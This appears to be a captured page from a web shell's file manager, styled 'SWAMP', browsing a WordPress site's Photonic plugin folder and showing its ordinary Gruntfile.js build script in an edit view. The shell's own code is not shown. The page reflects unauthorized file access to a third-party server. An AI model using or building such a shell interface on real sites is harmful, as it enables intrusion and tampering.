░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/peoplemoverstheatre/wp-content/plugins/photonic/grunt
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: Gruntfile.js
const webpackConfig = require('./webpack.config.js'); module.exports = function(grunt) { // Config grunt.initConfig({ pkg: grunt.file.readJSON('package.json'), dirs: { src_css: '../include/css/front-end/core', tp: '../include/ext', dest_js_base: '../include/js/front-end', dest_css_combo: '../include/css/front-end/combo', dest_css_combo_slider: '../include/css/front-end/combo-slider', i18n_src: '..', langs: 'languages' }, vars: { }, webpack: { myConfig: webpackConfig, }, clean: { css: { options: { force: true }, src: [ '<%= dirs.dest_css_combo %>', '<%= dirs.dest_css_combo_slider %>' ] }, js: { options: { force: true }, src: [ '<%= dirs.dest_js_base %>/out/**/*.*', ] }, jsLicenses: { options: { force: true }, src: [ '<%= dirs.dest_js_base %>/module/**/*.txt', '<%= dirs.dest_js_base %>/nomodule/**/*.txt', ] }, }, makepot: { target: { options: { type: 'wp-plugin', potFilename: 'photonic.pot', cwd: '<%= dirs.i18n_src %>', domainPath: '<%= dirs.langs %>' } } } }); // Load plugins const cwd = process.cwd(); process.chdir('../../../../..'); grunt.loadNpmTasks('grunt-webpack'); grunt.loadNpmTasks('grunt-contrib-clean'); grunt.loadNpmTasks('grunt-contrib-concat'); grunt.loadNpmTasks('grunt-contrib-copy'); grunt.loadNpmTasks('grunt-contrib-cssmin'); grunt.loadNpmTasks('grunt-wp-i18n'); process.chdir(cwd); const lightboxes = [ 'BaguetteBox', 'BigPicture', 'Colorbox', 'Fancybox', 'Fancybox2', 'Fancybox3', 'Featherlight', 'GLightbox', 'ImageLightbox', 'Lightcase', 'Lightgallery', 'Magnific', 'none', 'PhotoSwipe', 'PrettyPhoto', 'Spotlight', 'Strip', 'Swipebox', 'Thickbox', 'VenoBox', ]; function buildCSS() { const tasks = []; grunt.task.run([ 'clean:css' ]); grunt.config(['cssmin', 'core'], { files: [{ expand: true, cwd: '<%= dirs.src_css %>', src: ['*.css', '!*.min.css'], dest: '<%= dirs.src_css %>/', ext: '.min.css' }] }); tasks.push('cssmin:core'); grunt.task.run(tasks); } function buildPOT() { grunt.task.run([ 'makepot:target' ]); } function buildAll() { buildJS(); buildCSS(); buildPOT(); } function buildJS() { // First run WebPack to generate the files. This generates 2 files per library - one minified and the other unminified. grunt.task.run([ 'clean:js', 'webpack', 'clean:jsLicenses', ]); } grunt.registerTask('buildAll', buildAll); grunt.registerTask('buildCSS', buildCSS); grunt.registerTask('buildPOT', buildPOT); grunt.registerTask('buildJS', buildJS); };
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 Gruntfile.js
JS
2.7 KB
2026-01-17 04:57
EDIT
📄 package.json
JSON
1.4 KB
2026-01-17 04:57
EDIT
📄 webpack.config.js
JS
5.5 KB
2026-01-17 04:57
EDIT